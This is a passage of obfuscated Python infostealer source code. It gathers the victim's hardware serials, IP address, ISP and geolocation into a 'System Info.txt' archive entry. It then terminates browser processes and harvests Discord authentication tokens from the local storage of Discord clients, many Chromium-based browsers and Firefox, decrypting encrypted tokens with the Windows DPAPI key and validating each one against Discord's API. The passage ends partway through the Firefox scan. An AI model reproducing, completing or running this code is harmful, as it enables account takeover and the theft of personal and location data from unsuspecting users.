 - Guid Serial Number        : {WNGTUQVDVSLTNVRHJZGSOPONLMCMDHTXPNZACAOPWQDSBCFFQRMJLTAWEMTWFMRNKWALVXNE}
 - Uuid Serial Number        : {WBEPODJIOFAUINRRGAZJHLFPTJKHTGBBUWMLTMMQEANCABDTTW}
 - Motherboard Serial Number : {VACZNTPNQTWMWIRRENQMMYKNKYUDQCLQSTKSNSZEVXZPSQGECQTBZVMHMGVISXRONJOUVF}
 - Motherboard Product       : {HFYVGEQUXBHZCCUNNEGJPJLDEBZHCTKMMASLTXZVDDQWMGTAMSUJZRTOLEL}
 - Motherboard Manufacturer  : {USJGDTMWWZEMEZPNXGSNRGTFLJVDEQHRWGVEMVYVRDNHNJXXQUWCUSZJAEBOVTRTJDKLIKOASL}
 - Processor Serial Number   : {QZTREBGPKCQPAYSOWTDWSHNMUGAWOSVESURGIROOJZSPXXKMYUZJPTTNI}
 - Bios Serial Number        : {LCXQTKANYBGVAZOTOWYVQIKCRJSLBWJODIPRBBWXPZYIGVYWIODFMSKPWTAJTVIYMEJUWODPYHY}
 - Bios Release Date         : {VAGBUDHYEBNUJWXPYUPCZPNIXVWQPEYQOTXOLBKYBRABTTJDCKZJLMFJHOMFGTCOMWCJ}
 - Bios Version              : {QSUVDXNZYHUBGOBPHDHXWMJXHSCKATFNDUONSTKYHIBNQBHSKOCSXQGOPFQDGJQUFHVZWUR}
 - System Bios Version       : {QBQSDKROASOTHOSCRFNSPBMFLNBWXUJDYDFLJSUVQBHHHGSSSXLLHEBNSXNIWJIRBXKGUSJBKLZVIXTDDOYYSTTMF}
 - System Version            : {LQOJTQSCYFGAGAFWXSWPTNOQFLWWSVDBMUPZPXDGLHXBIVSDOEDJORED}
 - System Family             : {MEMAYKKSPYCKBBWIQZKFERYZBBLOOWHIFVGMNFXKLYIMDRACGUSOQCKWVRYQHSOKWPIUSSZBKEDZFQK}
 - System Manufacturer       : {OWFNLZETFFJWRZQISUJCGVLOIGPWTHYSQFRSQIVPXBJCNJATMYJFODSOVMOWNRLBHWLVQY}
 - System Product            : {FUHZOEVNVWMXGPHFNKVUYIZJDNGLQWDZZUBRAXRUESPEZGOGUIUBYTACZECSBFH}
 - System SKU                : {TNNPCIEDXQCOJJTKIEALBIVDZDOXOJNRBYJMODJKKALEPBPKWPFASBQQCTEQEYIYYXDKTHTFRDUVTNRWUKSKI}
 - Oem String Serial Number  : {WQORVWKFHDHCDHBITWXOIZCNBAKVQBUEFCTDYZPEUYHQWVDXNBBPCWLECUQTSLAJMMELHSDIWOMDW}
 - Asset Tag Serial Number   : {XIQIGDSPBEUKMHWPXZQYRITLNLFUAHOQVZBBMGNWABPFMKZTLZELYLZHMHRDCEKSXGKHABKQIUQINMOWWEMLSGNUADUWPFVKXACC}

Ip:
 - Public : {MXAHHHFNPRGVFHUCAVPSUXDSBKPLHUYFPMHRVSDWQXFSVUYYGOFXITWTIEJTPVYPQKNCKBINTAOBL}
 - Local  : {OOLRSGSTTHIBAEMCZAASWXBBZLJUABLBZXCXOUQMREVRUXIGTPPUJLYSYH}

Ip Information:
 - Isp : {UIVQRVNUAUEOLYMVYRUAZVKMBZLQYWLKUBIHECJFIOMXRGBVNWDSVKQVQOJPUJHKEYKPLDCZVHRWXPXSHGQDPCWE}
 - Org : {PQRFOHEEUGTRQFUBGMXXAFLTAOJWXBYJCALGWWAPPLJCOZSHJHBTKQCTXHDZYKCQKUAYEPLUSL}
 - As  : {CJKOWOBQIZNNZMLTMPHGLBSWWJNZMLYZXEBKKCHSIEIQZXXLIDHHPYMWHEQLHEJWSWARAGFQGMDGO}

Ip Location:
 - Country   : {LBPUKSYYAHSFYHRMBFKSREEGUJBNZCPTKXYMDJPBKSSENTRTYZFKYKROYRMTESQCBOHJHA} ({LBPUKSYYAHSFYHRMBFKSREEGUJBNZCPTKXYMDJPBKSSENTRTYZFKYKROYRMTESQCBOHJHA_code})
 - Region    : {IMNJQIGDUFLWRCYYUDNCHNXNVXRKIUERAWAQTGVTXPQCYYCAACKGKGGIL} ({IMNJQIGDUFLWRCYYUDNCHNXNVXRKIUERAWAQTGVTXPQCYYCAACKGKGGIL_code})
 - Zip       : {ZMNFRKXUIEOWSGEGVIQYMDHFMMBNAGZANSBZPQHNJOJEDWPZNGBIHWSAIWANZNAZOXPKUGGFWTX}
 - City      : {UBQLUUKHVSVMPDZENHCXHVPKCHKTSQFVVXAYRLMSESMMVXKVLMVTZ}
 - Timezone  : {ICIBWHRNSGGKRCQXAWECYHDPYCAIHVRLKUCQPXZUOOINPTDWAD}
 - Longitude : {KTWTMQFPHUAIQGONJGXXJVUBPQPKXGOWHNWGKFLKDBMPEXZFHHTWHGSGQMZM}
 - Latitude  : {LHQSWDSBJQHKAWLBZPBCCVSFOFSBIZHOYWEAARSDNITYCCKHHWYKNTUNPRSVTIQRJZGBTVQFCACATQQT}
"""
    PDANVHDKUSTMEXEGGQJCZVDJQCUEWAKDEIFWYRMIFOQUMTKZGTGQVXJZIQYOFFJFEGGZHPIZEXXRORUBWHMSJAHFPPF.writestr("System Info.txt", TFPPPRUKSZQGHVFDVMUUGKFZLZJQKCCFNXCAEXMEVOIKGELIZORQHJBHJGZSVXYHLZNDHCEEIKVLZPLNJ)

    return XVWGKXVBCUVKUHDHWAHQDIZRQZQOOLRALWTNXNUZEKDDQLKNAPNPIQUSSJDUAFNMREQCLCZERFSHNAOBHLXZBCX_system_info

def NQVTLQYTQPHRXWIWPQFXFCQRJPEFLCFXCAYKCHOLEKQROXXWENLMBOBVZLSGKBDZAPFFWWYEODLVKJXVFGBXEAOYSGZPTG(PDANVHDKUSTMEXEGGQJCZVDJQCUEWAKDEIFWYRMIFOQUMTKZGTGQVXJZIQYOFFJFEGGZHPIZEXXRORUBWHMSJAHFPPF):
    import os
    import re
    import json
    import base64
    import requests
    import psutil
    from Cryptodome.Cipher import AES
    from win32crypt import CryptUnprotectData

    HMRMAYDATFAVVYUOUGMIAAHSRIBFPUYNHDMLRQDTVPFCNEDHNKIOXHVJTQFEXSFRKMWQKZLSYBSNTPNBNPVJTFBE = ""
    MOSIXTOUFTPIQXKVFQOLRMSEDFCSVFFEGBCZPMJNCFDYCXGSOVVUDKHULZSJQTNZGUCYGM = 0

    def VIOEUNXHHFUHEPUJELLJJCVRBDZYKPPCMDHDWHEOTKYWFWIXOIOCUFFBPYX():  
        EEACJIEWTAIRGBJJTAPIBCGURAKWBVDCUKAGGAVHTSZNQYZOECJOMWI = "https://discord.com/api/v9/users/@me"
        WQBAEEOGXAISDWXGOCOYMKEGJBGUONGDZFXRTPBUTSLLEWCSKZFLRB = r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}"
        WQBAEEOGXAISDWXGOCOYMKEGJBGUONGDZFXRTPBUTSLLEWCSKZFLRB_enc = r"dQw4w9WgXcQ:[^\"]*"
        TSDUHDGBELRKRNJVTFETQKLCGGHHSLLXUZOCCQNMOJLZDWEPXSRDYPWIFWULPICBB = []
        QZLHQIXZQWGMPDFYCAQRZVPKSKCAQDMIDVVDSAXKJREYYSDQFBSOCWVAHSEXSCKACLUKDYFZPHGOYDKLRQUIO = []
        UQFREWYZLJVZCELBCBKLMUBNGQDXWWWWJZHSFQTSDLLZZIZILKDUUHBXEPGALOMKXNZZTBPPEVKYPOZABMFB = {}

        DEZNJKCEXSBSVCDNIZXCLFQVWVLPCPHKKLZHTOABBVWTAWTTDKP = [
            ("Discord",                os.path.join(VUMNXCAKSMMYVIFQFYAERSTJJBJTBEXOZPGVEXEUYHZBUVFBWSQNDKLQLFNPIKZZLRJJBVEAZYCWYNXRCADFOGZJFCCLLA, "discord", "Local Storage", "leveldb"),                                                  ""),
            ("Discord Canary",         os.path.join(VUMNXCAKSMMYVIFQFYAERSTJJBJTBEXOZPGVEXEUYHZBUVFBWSQNDKLQLFNPIKZZLRJJBVEAZYCWYNXRCADFOGZJFCCLLA, "discordcanary", "Local Storage", "leveldb"),                                            ""),
            ("Lightcord",              os.path.join(VUMNXCAKSMMYVIFQFYAERSTJJBJTBEXOZPGVEXEUYHZBUVFBWSQNDKLQLFNPIKZZLRJJBVEAZYCWYNXRCADFOGZJFCCLLA, "Lightcord", "Local Storage", "leveldb"),                                                ""),
            ("Discord PTB",            os.path.join(VUMNXCAKSMMYVIFQFYAERSTJJBJTBEXOZPGVEXEUYHZBUVFBWSQNDKLQLFNPIKZZLRJJBVEAZYCWYNXRCADFOGZJFCCLLA, "discordptb", "Local Storage", "leveldb"),                                               ""),
            ("Opera",                  os.path.join(VUMNXCAKSMMYVIFQFYAERSTJJBJTBEXOZPGVEXEUYHZBUVFBWSQNDKLQLFNPIKZZLRJJBVEAZYCWYNXRCADFOGZJFCCLLA, "Opera Software", "Opera Stable", "Local Storage", "leveldb"),                           "opera.exe"),
            ("Opera GX",               os.path.join(VUMNXCAKSMMYVIFQFYAERSTJJBJTBEXOZPGVEXEUYHZBUVFBWSQNDKLQLFNPIKZZLRJJBVEAZYCWYNXRCADFOGZJFCCLLA, "Opera Software", "Opera GX Stable", "Local Storage", "leveldb"),                        "opera.exe"),
            ("Opera Neon",             os.path.join(VUMNXCAKSMMYVIFQFYAERSTJJBJTBEXOZPGVEXEUYHZBUVFBWSQNDKLQLFNPIKZZLRJJBVEAZYCWYNXRCADFOGZJFCCLLA, "Opera Software", "Opera Neon", "Local Storage", "leveldb"),                             "opera.exe"),
            ("Amigo",                  os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "Amigo", "User Data", "Local Storage", "leveldb"),                                       "amigo.exe"),
            ("Torch",                  os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "Torch", "User Data", "Local Storage", "leveldb"),                                       "torch.exe"),
            ("Kometa",                 os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "Kometa", "User Data", "Local Storage", "leveldb"),                                      "kometa.exe"),
            ("Orbitum",                os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "Orbitum", "User Data", "Local Storage", "leveldb"),                                     "orbitum.exe"),
            ("CentBrowser",            os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "CentBrowser", "User Data", "Local Storage", "leveldb"),                                 "centbrowser.exe"),
            ("7Star",                  os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "7Star", "7Star", "User Data", "Local Storage", "leveldb"),                              "7star.exe"),
            ("Sputnik",                os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "Sputnik", "Sputnik", "User Data", "Local Storage", "leveldb"),                          "sputnik.exe"),
            ("Vivaldi",                os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "Vivaldi", "User Data", "Default", "Local Storage", "leveldb"),                          "vivaldi.exe"),
            ("Google Chrome",          os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "Google", "Chrome", "User Data", "Default", "Local Storage", "leveldb"),                 "chrome.exe"),
            ("Google Chrome",          os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "Google", "Chrome", "User Data", "Profile 1", "Local Storage", "leveldb"),               "chrome.exe"),
            ("Google Chrome",          os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "Google", "Chrome", "User Data", "Profile 2", "Local Storage", "leveldb"),               "chrome.exe"),
            ("Google Chrome",          os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "Google", "Chrome", "User Data", "Profile 3", "Local Storage", "leveldb"),               "chrome.exe"),
            ("Google Chrome",          os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "Google", "Chrome", "User Data", "Profile 4", "Local Storage", "leveldb"),               "chrome.exe"),
            ("Google Chrome",          os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "Google", "Chrome", "User Data", "Profile 5", "Local Storage", "leveldb"),               "chrome.exe"),
            ("Google Chrome SxS",      os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "Google", "Chrome SxS", "User Data", "Default", "Local Storage", "leveldb"),             "chrome.exe"),
            ("Google Chrome Beta",     os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "Google", "Chrome Beta", "User Data", "Default", "Local Storage", "leveldb"),            "chrome.exe"),
            ("Google Chrome Dev",      os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "Google", "Chrome Dev", "User Data", "Default", "Local Storage", "leveldb"),             "chrome.exe"),
            ("Google Chrome Unstable", os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "Google", "Chrome Unstable", "User Data", "Default", "Local Storage", "leveldb"),        "chrome.exe"),
            ("Google Chrome Canary",   os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "Google", "Chrome Canary", "User Data", "Default", "Local Storage", "leveldb"),          "chrome.exe"),
            ("Epic Privacy Browser",   os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "Epic Privacy Browser", "User Data", "Local Storage", "leveldb"),                        "epic.exe"),
            ("Microsoft Edge",         os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "Microsoft", "Edge", "User Data", "Default", "Local Storage", "leveldb"),                "msedge.exe"),
            ("Uran",                   os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "uCozMedia", "Uran", "User Data", "Default", "Local Storage", "leveldb"),                "uran.exe"),
            ("Yandex",                 os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "Yandex", "YandexBrowser", "User Data", "Default", "Local Storage", "leveldb"),          "yandex.exe"),
            ("Yandex Canary",          os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "Yandex", "YandexBrowserCanary", "User Data", "Default", "Local Storage", "leveldb"),    "yandex.exe"),
            ("Yandex Developer",       os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "Yandex", "YandexBrowserDeveloper", "User Data", "Default", "Local Storage", "leveldb"), "yandex.exe"),
            ("Yandex Beta",            os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "Yandex", "YandexBrowserBeta", "User Data", "Default", "Local Storage", "leveldb"),      "yandex.exe"),
            ("Yandex Tech",            os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "Yandex", "YandexBrowserTech", "User Data", "Default", "Local Storage", "leveldb"),      "yandex.exe"),
            ("Yandex SxS",             os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "Yandex", "YandexBrowserSxS", "User Data", "Default", "Local Storage", "leveldb"),       "yandex.exe"),
            ("Brave",                  os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "BraveSoftware", "Brave-Browser", "User Data", "Default", "Local Storage", "leveldb"),   "brave.exe"),
            ("Iridium",                os.path.join(YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN,   "Iridium", "User Data", "Default", "Local Storage", "leveldb"),                          "iridium.exe"),
        ]

        
        try:
             for YGXUMDNCHUYBJBJLZZBVQVSQZADEVLVLLIWJWSJMYZJFSUJYCXOJDVXBFYWNBRW, PRHTQDMAMBBBTJJEDRDSUSHIIJBTFVSOGCHLBIJOWLLDRNJOQASIFZETJ, v4r_proc_name in DEZNJKCEXSBSVCDNIZXCLFQVWVLPCPHKKLZHTOABBVWTAWTTDKP:
                for v4r_proc in psutil.process_iter(['pid', 'name']):
                    try:
                        if v4r_proc.name().lower() == v4r_proc_name.lower():
                            v4r_proc.terminate()
                    except: pass
        except: pass

        for YGXUMDNCHUYBJBJLZZBVQVSQZADEVLVLLIWJWSJMYZJFSUJYCXOJDVXBFYWNBRW, PRHTQDMAMBBBTJJEDRDSUSHIIJBTFVSOGCHLBIJOWLLDRNJOQASIFZETJ, v4r_proc_name in DEZNJKCEXSBSVCDNIZXCLFQVWVLPCPHKKLZHTOABBVWTAWTTDKP:
            if not os.path.exists(PRHTQDMAMBBBTJJEDRDSUSHIIJBTFVSOGCHLBIJOWLLDRNJOQASIFZETJ):

                continue
            VOURVFEMPCILDUGEMUFHOWHYNZUFWTVDPIGOIIAGSRZLFXNOTGDRELTXYDQTGYIXPLUWLHCMSX = YGXUMDNCHUYBJBJLZZBVQVSQZADEVLVLLIWJWSJMYZJFSUJYCXOJDVXBFYWNBRW.replace(" ", "").lower()
            if "cord" in PRHTQDMAMBBBTJJEDRDSUSHIIJBTFVSOGCHLBIJOWLLDRNJOQASIFZETJ:
                if not os.path.exists(os.path.join(VUMNXCAKSMMYVIFQFYAERSTJJBJTBEXOZPGVEXEUYHZBUVFBWSQNDKLQLFNPIKZZLRJJBVEAZYCWYNXRCADFOGZJFCCLLA, VOURVFEMPCILDUGEMUFHOWHYNZUFWTVDPIGOIIAGSRZLFXNOTGDRELTXYDQTGYIXPLUWLHCMSX, 'Local State')):
                    continue
                for v4r_file_name in os.listdir(PRHTQDMAMBBBTJJEDRDSUSHIIJBTFVSOGCHLBIJOWLLDRNJOQASIFZETJ):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    KNMSTWAYDXQVFVZLRSOKAJSMQXYYSIXHRGZRIOQQNRINBWKTVR = os.path.join(PRHTQDMAMBBBTJJEDRDSUSHIIJBTFVSOGCHLBIJOWLLDRNJOQASIFZETJ, v4r_file_name)
                    if os.path.exists(KNMSTWAYDXQVFVZLRSOKAJSMQXYYSIXHRGZRIOQQNRINBWKTVR):
                        with open(KNMSTWAYDXQVFVZLRSOKAJSMQXYYSIXHRGZRIOQQNRINBWKTVR, errors='ignore') as v4r_file:
                            for v4r_line in v4r_file:
                                for y in re.findall(WQBAEEOGXAISDWXGOCOYMKEGJBGUONGDZFXRTPBUTSLLEWCSKZFLRB_enc, v4r_line.strip()):
                                    PZXJLMSEQQFARERGFASUKXABWQWYANNGRVKSDUEIEJHJAJJRUBKYJYDKPIRRJHXPFFVQWDKSLWIBBDQSLOWFUAXVAUGLIRJGLW = BEOQLFEJHCTKXHOXXAJDZJFKJMPSWIOFFFKRNXNNRXRTEEPDXDFGFLWWMQPBGGPJFSVILXPTAYXMMNVal(base64.b64decode(y.split('dQw4w9WgXcQ:')[1]), TLZQEGHNRLBNCIMNOMTBEICGSKCJKOLGZMUMSXSPQLTFXEZACFYIZVSIVTYOIPANHVT(os.path.join(VUMNXCAKSMMYVIFQFYAERSTJJBJTBEXOZPGVEXEUYHZBUVFBWSQNDKLQLFNPIKZZLRJJBVEAZYCWYNXRCADFOGZJFCCLLA, VOURVFEMPCILDUGEMUFHOWHYNZUFWTVDPIGOIIAGSRZLFXNOTGDRELTXYDQTGYIXPLUWLHCMSX, 'Local State')))
                                    if KXGDBVSJJEDFOKDMCGFQQYIZUMHFQSIMTGUMICJKAGFMVXCAEXMYRZZZEXBAWIKSFRKPOYDTLHILDPGOEIWETTDKJWKMQKXBG(PZXJLMSEQQFARERGFASUKXABWQWYANNGRVKSDUEIEJHJAJJRUBKYJYDKPIRRJHXPFFVQWDKSLWIBBDQSLOWFUAXVAUGLIRJGLW, EEACJIEWTAIRGBJJTAPIBCGURAKWBVDCUKAGGAVHTSZNQYZOECJOMWI):
                                        VUSVJEZEFEYBPAYYNFUPTFVQXGERTMWYPFTAPFMFFPKSCJGUOQOEACBRRGUWRWCEHIUIHUY = requests.get(EEACJIEWTAIRGBJJTAPIBCGURAKWBVDCUKAGGAVHTSZNQYZOECJOMWI, headers={'Authorization': PZXJLMSEQQFARERGFASUKXABWQWYANNGRVKSDUEIEJHJAJJRUBKYJYDKPIRRJHXPFFVQWDKSLWIBBDQSLOWFUAXVAUGLIRJGLW}).json()['id']
                                        if VUSVJEZEFEYBPAYYNFUPTFVQXGERTMWYPFTAPFMFFPKSCJGUOQOEACBRRGUWRWCEHIUIHUY not in QZLHQIXZQWGMPDFYCAQRZVPKSKCAQDMIDVVDSAXKJREYYSDQFBSOCWVAHSEXSCKACLUKDYFZPHGOYDKLRQUIO:
                                            TSDUHDGBELRKRNJVTFETQKLCGGHHSLLXUZOCCQNMOJLZDWEPXSRDYPWIFWULPICBB.append(PZXJLMSEQQFARERGFASUKXABWQWYANNGRVKSDUEIEJHJAJJRUBKYJYDKPIRRJHXPFFVQWDKSLWIBBDQSLOWFUAXVAUGLIRJGLW)
                                            QZLHQIXZQWGMPDFYCAQRZVPKSKCAQDMIDVVDSAXKJREYYSDQFBSOCWVAHSEXSCKACLUKDYFZPHGOYDKLRQUIO.append(VUSVJEZEFEYBPAYYNFUPTFVQXGERTMWYPFTAPFMFFPKSCJGUOQOEACBRRGUWRWCEHIUIHUY)
                                            UQFREWYZLJVZCELBCBKLMUBNGQDXWWWWJZHSFQTSDLLZZIZILKDUUHBXEPGALOMKXNZZTBPPEVKYPOZABMFB[PZXJLMSEQQFARERGFASUKXABWQWYANNGRVKSDUEIEJHJAJJRUBKYJYDKPIRRJHXPFFVQWDKSLWIBBDQSLOWFUAXVAUGLIRJGLW] = (YGXUMDNCHUYBJBJLZZBVQVSQZADEVLVLLIWJWSJMYZJFSUJYCXOJDVXBFYWNBRW, KNMSTWAYDXQVFVZLRSOKAJSMQXYYSIXHRGZRIOQQNRINBWKTVR)
            else:
                for v4r_file_name in os.listdir(PRHTQDMAMBBBTJJEDRDSUSHIIJBTFVSOGCHLBIJOWLLDRNJOQASIFZETJ):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    KNMSTWAYDXQVFVZLRSOKAJSMQXYYSIXHRGZRIOQQNRINBWKTVR = os.path.join(PRHTQDMAMBBBTJJEDRDSUSHIIJBTFVSOGCHLBIJOWLLDRNJOQASIFZETJ, v4r_file_name)
                    if os.path.exists(KNMSTWAYDXQVFVZLRSOKAJSMQXYYSIXHRGZRIOQQNRINBWKTVR):
                        with open(KNMSTWAYDXQVFVZLRSOKAJSMQXYYSIXHRGZRIOQQNRINBWKTVR, errors='ignore') as v4r_file:
                            for v4r_line in v4r_file:
                                for PZXJLMSEQQFARERGFASUKXABWQWYANNGRVKSDUEIEJHJAJJRUBKYJYDKPIRRJHXPFFVQWDKSLWIBBDQSLOWFUAXVAUGLIRJGLW in re.findall(WQBAEEOGXAISDWXGOCOYMKEGJBGUONGDZFXRTPBUTSLLEWCSKZFLRB, v4r_line.strip()):
                                    if KXGDBVSJJEDFOKDMCGFQQYIZUMHFQSIMTGUMICJKAGFMVXCAEXMYRZZZEXBAWIKSFRKPOYDTLHILDPGOEIWETTDKJWKMQKXBG(PZXJLMSEQQFARERGFASUKXABWQWYANNGRVKSDUEIEJHJAJJRUBKYJYDKPIRRJHXPFFVQWDKSLWIBBDQSLOWFUAXVAUGLIRJGLW, EEACJIEWTAIRGBJJTAPIBCGURAKWBVDCUKAGGAVHTSZNQYZOECJOMWI):
                                        VUSVJEZEFEYBPAYYNFUPTFVQXGERTMWYPFTAPFMFFPKSCJGUOQOEACBRRGUWRWCEHIUIHUY = requests.get(EEACJIEWTAIRGBJJTAPIBCGURAKWBVDCUKAGGAVHTSZNQYZOECJOMWI, headers={'Authorization': PZXJLMSEQQFARERGFASUKXABWQWYANNGRVKSDUEIEJHJAJJRUBKYJYDKPIRRJHXPFFVQWDKSLWIBBDQSLOWFUAXVAUGLIRJGLW}).json()['id']
                                        if VUSVJEZEFEYBPAYYNFUPTFVQXGERTMWYPFTAPFMFFPKSCJGUOQOEACBRRGUWRWCEHIUIHUY not in QZLHQIXZQWGMPDFYCAQRZVPKSKCAQDMIDVVDSAXKJREYYSDQFBSOCWVAHSEXSCKACLUKDYFZPHGOYDKLRQUIO:
                                            TSDUHDGBELRKRNJVTFETQKLCGGHHSLLXUZOCCQNMOJLZDWEPXSRDYPWIFWULPICBB.append(PZXJLMSEQQFARERGFASUKXABWQWYANNGRVKSDUEIEJHJAJJRUBKYJYDKPIRRJHXPFFVQWDKSLWIBBDQSLOWFUAXVAUGLIRJGLW)
                                            QZLHQIXZQWGMPDFYCAQRZVPKSKCAQDMIDVVDSAXKJREYYSDQFBSOCWVAHSEXSCKACLUKDYFZPHGOYDKLRQUIO.append(VUSVJEZEFEYBPAYYNFUPTFVQXGERTMWYPFTAPFMFFPKSCJGUOQOEACBRRGUWRWCEHIUIHUY)
                                            UQFREWYZLJVZCELBCBKLMUBNGQDXWWWWJZHSFQTSDLLZZIZILKDUUHBXEPGALOMKXNZZTBPPEVKYPOZABMFB[PZXJLMSEQQFARERGFASUKXABWQWYANNGRVKSDUEIEJHJAJJRUBKYJYDKPIRRJHXPFFVQWDKSLWIBBDQSLOWFUAXVAUGLIRJGLW] = (YGXUMDNCHUYBJBJLZZBVQVSQZADEVLVLLIWJWSJMYZJFSUJYCXOJDVXBFYWNBRW, KNMSTWAYDXQVFVZLRSOKAJSMQXYYSIXHRGZRIOQQNRINBWKTVR)

        if os.path.exists(os.path.join(VUMNXCAKSMMYVIFQFYAERSTJJBJTBEXOZPGVEXEUYHZBUVFBWSQNDKLQLFNPIKZZLRJJBVEAZYCWYNXRCADFOGZJFCCLLA, "Mozilla", "Firefox", "Profiles")):
            for PRHTQDMAMBBBTJJEDRDSUSHIIJBTFVSOGCHLBIJOWLLDRNJOQASIFZETJ, _, v4r_files in os.walk(os.path.join(VUMNXCAKSMMYVIFQFYAERSTJJBJTBEXOZPGVEXEUYHZBUVFBWSQNDKLQLFNPIKZZLRJJBVEAZYCWYNXRCADFOGZJFCCLLA, "Mozilla", "Firefox", "Profiles")):
                for v4r__file in v4r_files:
                    if v4r__file.endswith('.sqlite'):
                        with open(os.path.join(PRHTQDMAMBBBTJJEDRDSUSHIIJBTFVSOGCHLBIJOWLLDRNJOQASIFZETJ, v4r__file), errors='ignore') as v4r_file:
                            for v4r_line in v4r_file:
                                for PZXJLMSEQQFARERGFASUKXABWQWYANNGRVKSDUEIEJHJAJJRUBKYJYDKPIRRJHXPFFVQWDKSLWIBBDQSLOWFUAXVAUGLIRJGLW in re.findall(WQBAEEOGXAISDWXGOCOYMKEGJBGUONGDZFXRTPBUTSLLEWCSKZFLRB, v4r_line.strip()):
